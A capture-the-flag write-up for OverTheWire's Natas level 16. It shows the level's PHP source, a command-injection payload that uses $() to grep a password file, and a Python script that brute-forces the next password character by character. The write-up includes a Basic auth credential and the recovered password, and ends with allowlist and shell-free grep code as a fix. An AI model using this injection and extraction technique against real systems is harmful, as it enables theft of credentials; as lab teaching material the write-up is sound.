: level 15 → level 16
http://natas16.natas.labs.overthewire.org
The image above is the start screen of natas 16. First, let's look at the source code.
<html>
<head>
<!-- This stuff in the header has nothing to do with the level -->
<link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
<script>var wechallinfo = { "level": "natas16", "pass": "<censored>" };</script></head>
<body>
<h1>natas16</h1>
<div id="content">
For security reasons, we now filter even more on certain characters<br/><br/>
<form>
Find words containing: <input name=needle><input type=submit name=submit value=Search><br><br>
</form>
Output:
<pre>
<?
$key = "";
if(array_key_exists("needle", $_REQUEST)) {
$key = $_REQUEST["needle"];
}
if($key != "") {
if(preg_match('/[;|&`\'"]/',$key)) {
print "Input contains an illegal character!";
} else {
passthru("grep -i \"$key\" dictionary.txt");
}
}
?>
</pre>
<div id="viewsource"><a href="index-source.html">View sourcecode</a></div>
</div>
</body>
</html>
The input value is stored in $key, and preg_match filters out certain characters.
Once the filter is bypassed, we can see that passthru runs an external command. As last time, I'll solve it using the grep regular expression anchor ^.
I used $() to run an external command and, like SQL blind injection, tried to recover the password one character at a time.
I URL-encoded the following and built an automation program around it:
$(grep ^pw /etc/natas_webpass/natas17 dictionary.txt)&submit=Search
import socket

pw = ''
for i in range(1, 33):                      # the password is 32 characters long
    for ch in range(48, 123):               # candidate characters '0'..'z'
        if 58 <= ch <= 64: continue         # skip ':' .. '@'
        if 91 <= ch <= 96: continue         # skip '[' .. '`'
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.connect(("176.9.9.172", 80))
        # needle = $(grep ^<pw so far><ch> /etc/natas_webpass/natas17 dictionary.txt), URL-encoded
        header = "GET /"
        header += "?needle=%24%28grep%20%5E" + pw + chr(ch) + "%20/etc/natas_webpass/natas17%20dictionary.txt%29&submit=Search"
        header += " HTTP/1.1\r\n"
        header += "Host: natas16.natas.labs.overthewire.org\r\n"
        header += "Authorization: Basic bmF0YXMxNjpXYUlIRWFjajYzd25OSUJST0hlcWkzcDl0MG01bmhtaA==\r\n"
        header += "\r\n"
        sock.sendall(header.encode())
        response = sock.recv(65535).decode()
        sock.close()
        # A correct guess makes the inner grep print the password line, which then matches
        # nothing in dictionary.txt, so the word "African" disappears from the output.
        # A wrong guess expands to an empty needle, grep prints the whole dictionary,
        # and "African" is present.
        if not ("African" in response):
            pw += chr(ch)
            print(pw)
            break
print(pw)
The result of running it is as follows.
natas17 password: 8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw
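The root cause of this level is that the denylist never covers `$`, `(` or `)`, so `$(...)` still reaches the shell inside the double quotes that passthru's command string builds. The Python example below, added here and not part of the original writeup or the Natas project, mirrors the level's check, contrasts it with positive (allowlist) validation, and shows a search that never involves a shell: grep is started with an argv list, `-F` makes the needle literal and `--` stops option parsing. The dictionary file is constructed inline.

```python
import re
import subprocess
import tempfile
from pathlib import Path
from typing import List

# The level's denylist: /[;|&`'"]/ . Note that $ ( ) are absent.
DENYLIST = re.compile(r'[;|&`\'"]')
# Allowlist alternative: a word lookup only ever needs letters.
ALLOWLIST = re.compile(r'[A-Za-z]+')

def passes_denylist(needle: str) -> bool:
    """Mirror of the PHP check: True means the input would reach passthru."""
    return DENYLIST.search(needle) is None

def passes_allowlist(needle: str) -> bool:
    """Positive validation: accept only a non-empty run of letters."""
    return ALLOWLIST.fullmatch(needle) is not None

def safe_grep(needle: str, dictionary: Path) -> List[str]:
    """Case-insensitive literal search with no shell in the loop.

    The needle is one argv element, so shell metacharacters are never
    interpreted; -F disables regex anchors such as ^; -- prevents a
    needle like "-v" from being parsed as a grep option.
    """
    result = subprocess.run(
        ["grep", "-i", "-F", "--", needle, str(dictionary)],
        capture_output=True, text=True, check=False,
    )
    if result.returncode > 1:          # 1 = no match, >1 = real error
        raise RuntimeError(result.stderr.strip())
    return result.stdout.splitlines()

# Constructed sample dictionary (not the level's dictionary.txt).
SAMPLE_DICT = Path(tempfile.mkdtemp()) / "dictionary.txt"
SAMPLE_DICT.write_text("African\nafricans\nAfrikaans\nzebra\n")

# The writeup's payload, used here only as an input to the validators.
INJECTION = "$(grep ^pw /etc/natas_webpass/natas17 dictionary.txt)"

if __name__ == "__main__":
    print("denylist lets the payload through:", passes_denylist(INJECTION))
    print("allowlist rejects it:", not passes_allowlist(INJECTION))
    print("safe grep 'afri':", safe_grep("afri", SAMPLE_DICT))
    print("safe grep on the payload:", safe_grep(INJECTION, SAMPLE_DICT))
```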